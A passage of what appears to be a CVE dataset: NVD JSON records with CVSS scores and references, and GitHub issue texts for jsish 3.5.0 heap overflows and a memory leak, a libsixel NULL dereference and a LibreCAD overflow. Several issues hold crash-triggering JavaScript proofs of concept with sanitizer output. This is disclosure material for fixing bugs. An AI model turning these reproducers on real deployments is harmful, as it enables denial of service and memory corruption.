"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/61"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/61"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/pcmacdon/jsish/issues/61 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
var arr = [];
arr.x = 0;
delete arr[assert(hasProperty, 'hasProperty !== true')];
for (var i = 0; i < 2; ++i)
arr.unshift(i);
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
===ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000df38 at pc 0x5566ebe0b2f9 bp 0x7fffd0654660 sp 0x7fffd0654650
READ of size 8 at 0x60600000df38 thread T0
#0 0x5566ebe0b2f8 in jsiValueObjDelete src/jsiEval.c:464
#1 0x5566ebe0b2f8 in jsiEvalCodeSub src/jsiEval.c:1885
#2 0x5566ebe1915e in jsi_evalcode src/jsiEval.c:2204
#3 0x5566ebe1d274 in jsi_evalStrFile src/jsiEval.c:2665
#4 0x5566ebb0c66a in Jsi_Main src/jsiInterp.c:936
#5 0x5566ec31103a in jsi_main src/main.c:47
#6 0x7fbbb1d73bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#7 0x5566ebaa0969 in _start (/usr/local/bin/jsish+0xe8969)
Address 0x60600000df38 is a wild pointer.
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:464 in jsiValueObjDelete
Shadow bytes around the buggy address:
0x0c0c7fff9b90: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
0x0c0c7fff9ba0: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd
0x0c0c7fff9bb0: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
0x0c0c7fff9bc0: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
0x0c0c7fff9bd0: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
=>0x0c0c7fff9be0: 00 00 00 fa fa fa fa[fa]fa fa fa fa fa fa fa fa
0x0c0c7fff9bf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
Credits: Found by OWL337 team. | Heap-buffer-overflow src/jsiEval.c:464 in jsiValueObjDelete | https://api.github.com/repos/pcmacdon/jsish/issues/61/comments | 0 | 2021-12-24T10:30:42Z | 2022-01-12T02:13:11Z | https://github.com/pcmacdon/jsish/issues/61 | 1,088,302,674 | 61 | 3,091 |
CVE-2021-46481 | 2022-01-25T01:15:08.010 | Jsish v3.5.0 was discovered to contain a memory leak via linenoise at src/linenoise.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/55"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/55"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/pcmacdon/jsish/issues/55 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
var JSEtest = [
'aa',
'bb',
'hhh'
];
try { Number.bind(console.input('listNum' + JSEtest), 4)(); } catch (e) {};
try { (1 >> y).toFixed.bind(2, 4)(); } catch (e) {};
(1 >> y).toFixed.bind(2, 4)();
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
listNum [object Object]
/home/user/poc.js:10: error: apply Number.toFixed to a non-number object
ERROR:
=================================================================
ERROR: LeakSanitizer: detected memory leaks
Direct leak of 1 byte(s) in 1 object(s) allocated from:
#0 0x7f0e5412d538 in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x77538)
#1 0x56523c6594ad in linenoise src/linenoise.c:1061
SUMMARY: AddressSanitizer: 1 byte(s) leaked in 1 allocation(s).
```
Credits: Found by OWL337 team. | Memory leaks in linenoise src/linenoise.c:1061 | https://api.github.com/repos/pcmacdon/jsish/issues/55/comments | 0 | 2021-12-24T09:44:48Z | 2022-01-12T02:11:57Z | https://github.com/pcmacdon/jsish/issues/55 | 1,088,278,241 | 55 | 3,092 |
CVE-2021-46482 | 2022-01-25T01:15:08.050 | Jsish v3.5.0 was discovered to contain a heap buffer overflow via NumberConstructor at src/jsiNumber.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/66"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/66"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/pcmacdon/jsish/issues/66 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
var a = [
[0]
];
var actual = (Number).bind("abcdab", [
[0]
].indexOf("abcdab", 99))();
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000018b40 at pc 0x55803d35220a bp 0x7fff119980c0 sp 0x7fff119980b0
WRITE of size 4 at 0x604000018b40 thread T0
#0 0x55803d352209 in NumberConstructor src/jsiNumber.c:93
#1 0x55803d325818 in jsi_FuncCallSub src/jsiProto.c:244
#2 0x55803d2a2fec in jsi_FunctionInvoke src/jsiFunc.c:777
#3 0x55803d2a2fec in Jsi_FunctionInvoke src/jsiFunc.c:789
#4 0x55803d31ead6 in jsi_FuncBindCall src/jsiProto.c:299
#5 0x55803d325818 in jsi_FuncCallSub src/jsiProto.c:244
#6 0x55803d5ef71a in jsiFunctionSubCall src/jsiEval.c:796
#7 0x55803d5ef71a in jsiEvalFunction src/jsiEval.c:837
#8 0x55803d5ef71a in jsiEvalCodeSub src/jsiEval.c:1264
#9 0x55803d60315e in jsi_evalcode src/jsiEval.c:2204
#10 0x55803d607274 in jsi_evalStrFile src/jsiEval.c:2665
#11 0x55803d2f666a in Jsi_Main src/jsiInterp.c:936
#12 0x55803dafb03a in jsi_main src/main.c:47
#13 0x7ff56e70cbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#14 0x55803d28a969 in _start (/usr/local/bin/jsish+0xe8969)
0x604000018b40 is located 1 bytes to the right of 47-byte region [0x604000018b10,0x604000018b3f)
allocated by thread T0 here:
#0 0x7ff56f37bd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
#1 0x55803d2fbaa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiNumber.c:93 in NumberConstructor
Shadow bytes around the buggy address:
0x0c087fffb110: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 00
0x0c087fffb120: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c087fffb130: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c087fffb140: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 07
0x0c087fffb150: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
=>0x0c087fffb160: fa fa 00 00 00 00 00 07[fa]fa 00 00 00 00 00 00
0x0c087fffb170: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c087fffb180: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c087fffb190: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c087fffb1a0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
0x0c087fffb1b0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
Credits: Found by OWL337 team. | Heap-buffer-overflow src/jsiNumber.c:93 in NumberConstructor | https://api.github.com/repos/pcmacdon/jsish/issues/66/comments | 0 | 2021-12-24T10:35:07Z | 2022-01-12T02:14:08Z | https://github.com/pcmacdon/jsish/issues/66 | 1,088,304,812 | 66 | 3,093 |
CVE-2021-46483 | 2022-01-25T01:15:08.090 | Jsish v3.5.0 was discovered to contain a heap buffer overflow via BooleanConstructor at src/jsiBool.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/62"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/pcmacdon/jsish/issues/62"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jsish:jsish:3.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E97897F2-55BD-40DD-9F33-7980D892A505",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/pcmacdon/jsish/issues/62 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"pcmacdon",
"jsish"
] | ###### Jsish revision
Commit: [9fa798e](https://github.com/pcmacdon/jsish/commit/9fa798e35d7a753672d1bd16e98b124e7b2d2899)
Version: v3.5.0
###### Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
###### Build steps
```bash
export CFLAGS='-fsanitize=address'
make
```
###### Test case
```javascript
function JSEtest(val)
{
Boolean.bind(a)();
if (val < 3)
return true;
else
return false;
}
var arr = new Array(10);
arr[1] = 1;
Array.prototype.unshift(arr.every(JSEtest), true, 'test');
```
###### Execution steps & Output
```bash
$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000188c0 at pc 0x55dff29d9510 bp 0x7ffc8e20b280 sp 0x7ffc8e20b270
WRITE of size 4 at 0x6040000188c0 thread T0
#0 0x55dff29d950f in BooleanConstructor src/jsiBool.c:17
#1 0x55dff29af818 in jsi_FuncCallSub src/jsiProto.c:244
#2 0x55dff292cfec in jsi_FunctionInvoke src/jsiFunc.c:777
#3 0x55dff292cfec in Jsi_FunctionInvoke src/jsiFunc.c:789
#4 0x55dff29a8ad6 in jsi_FuncBindCall src/jsiProto.c:299
#5 0x55dff29af818 in jsi_FuncCallSub src/jsiProto.c:244
#6 0x55dff2c7971a in jsiFunctionSubCall src/jsiEval.c:796
#7 0x55dff2c7971a in jsiEvalFunction src/jsiEval.c:837
#8 0x55dff2c7971a in jsiEvalCodeSub src/jsiEval.c:1264
#9 0x55dff2c8d15e in jsi_evalcode src/jsiEval.c:2204
#10 0x55dff29b0834 in jsi_FuncCallSub src/jsiProto.c:220
#11 0x55dff292cfec in jsi_FunctionInvoke src/jsiFunc.c:777
#12 0x55dff292cfec in Jsi_FunctionInvoke src/jsiFunc.c:789
#13 0x55dff29f3f64 in jsi_ArrayFindSubCmd src/jsiArray.c:576
#14 0x55dff29f3f64 in jsi_ArrayEveryCmd src/jsiArray.c:663
#15 0x55dff29af818 in jsi_FuncCallSub src/jsiProto.c:244
#16 0x55dff2c7971a in jsiFunctionSubCall src/jsiEval.c:796
#17 0x55dff2c7971a in jsiEvalFunction src/jsiEval.c:837
#18 0x55dff2c7971a in jsiEvalCodeSub src/jsiEval.c:1264
#19 0x55dff2c8d15e in jsi_evalcode src/jsiEval.c:2204
#20 0x55dff2c91274 in jsi_evalStrFile src/jsiEval.c:2665
#21 0x55dff298066a in Jsi_Main src/jsiInterp.c:936
#22 0x55dff318503a in jsi_main src/main.c:47
#23 0x7fb189dc7bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
#24 0x55dff2914969 in _start (/usr/local/bin/jsish+0xe8969)
0x6040000188c0 is located 6 bytes to the right of 42-byte region [0x604000018890,0x6040000188ba)
allocated by thread T0 here:
#0 0x7fb18aa36d28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28)
#1 0x55dff2985aa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiBool.c:17 in BooleanConstructor
Shadow bytes around the buggy address:
0x0c087fffb0c0: fa fa 00 00 00 00 00 06 fa fa 00 00 00 00 00 00
0x0c087fffb0d0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00
0x0c087fffb0e0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c087fffb0f0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
0x0c087fffb100: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
=>0x0c087fffb110: fa fa 00 00 00 00 00 02[fa]fa 00 00 00 00 00 00
0x0c087fffb120: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c087fffb130: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c087fffb140: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c087fffb150: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
0x0c087fffb160: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
```
Credits: Found by OWL337 team. | Heap-buffer-overflow src/jsiBool.c:17 in BooleanConstructor | https://api.github.com/repos/pcmacdon/jsish/issues/62/comments | 0 | 2021-12-24T10:31:27Z | 2022-01-12T02:13:25Z | https://github.com/pcmacdon/jsish/issues/62 | 1,088,303,083 | 62 | 3,094 |
CVE-2021-45340 | 2022-01-25T12:15:07.643 | In Libsixel prior to and including v1.10.3, a NULL pointer dereference in the stb_image.h component of libsixel allows attackers to cause a denial of service (DOS) via a crafted PICT file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libsixel/libsixel/issues/51"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/libsixel/libsixel/issues/51"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libsixel_project:libsixel:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F4049A12-67EA-4961-9B1A-331D52D04E8D",
"versionEndExcluding": null,
"versionEndIncluding": "1.10.3",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/libsixel/libsixel/issues/51 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"libsixel",
"libsixel"
] | This is a duplicate report of issue [160](https://github.com/saitoha/libsixel/issues/160) in the original project. I'm not sure where best to report this, but it affects both projects.
## Vulnerable versions
* saitoha/libsixel at the latest (6a5be8b72d84037b83a5ea838e17bcf372ab1d5f) commit
* libsixel/libsixel at the latest (bc93c8ce570b35b8f3bb429ea5892ac260e4c8b1) commit
## Steps to reproduce
`img2sixel stbio_1561_poc.bin`
Input file (a malformed PICT-format image) is [attached](https://github.com/libsixel/libsixel/files/7715065/stbi_1561_poc.zip)
## Cause
Segmentation fault in `stbi__convert_format` at `stb_image.h:1561`:
```c
switch (STBI__COMBO(img_n, req_comp)) {
/* ... */
STBI__CASE(4,3) { dest[0]=src[0],dest[1]=src[1],dest[2]=src[2]; } break;
/* ... */
}
```
The `src` pointer is `NULL`, as passed in from `stbi__pic_load`.
The source of the NULL pointer is the malloc at line `6120`:
```c
result = (stbi_uc *) stbi__malloc_mad4(x, y, 4, 0);
```
whose output is never checked for `NULL`. The x and y dimensions (39168, 5888) are read
directly from the input file, and they pass the check in `stbi__mad3sizes_valid` which
only checks for integer overflow.
The total size of the allocated buffer is `39168 * 5888 * 4` and allocation fails.
## Impact
Denial of service is the only obvious impact.
## Mitigation
`stb_image` starting at version 2.27 (commit 50072f66589f52f51eb5b3f56b9272ea8ec1fdac) include a check for this condition. libsixel should be brought up-to-date with this version if possible.
If not, backport [the check](https://github.com/nothings/stb/blob/af1a5bc352164740c1cc1354942b1c6b72eacb8a/stb_image.h#L6448) as well as similar error checks for other malloc calls.
| NULL pointer dereference in stb_image.h | https://api.github.com/repos/libsixel/libsixel/issues/51/comments | 9 | 2021-12-14T22:08:42Z | 2025-02-12T00:02:11Z | https://github.com/libsixel/libsixel/issues/51 | 1,080,342,756 | 51 | 3,095 |
CVE-2021-45341 | 2022-01-25T12:15:07.693 | A buffer overflow vulnerability in CDataMoji of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreCAD/LibreCAD/issues/1462"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCC2FZ6HZOIK3775K4MTCOUHX6PLGPEL/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUMH3CWGVSMR2UIZEA35Q5UB7PDVVVYS/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://security.gentoo.org/glsa/202305-26"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5077"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/LibreCAD/LibreCAD/issues/1462"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FCC2FZ6HZOIK3775K4MTCOUHX6PLGPEL/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUMH3CWGVSMR2UIZEA35Q5UB7PDVVVYS/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://security.gentoo.org/glsa/202305-26"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2022/dsa-5077"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:librecad:librecad:*:*:*:*:*:*:*:*",
"matchCriteriaId": "952DEFEE-00FC-4BBC-8305-8611255AF7C3",
"versionEndExcluding": "2.2.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:librecad:librecad:2.2.0:rc1:*:*:*:*:*:*",
"matchCriteriaId": "84591147-6A0D-4F5C-91F3-51DF9F64FCF5",
"versionEndExcluding": null,
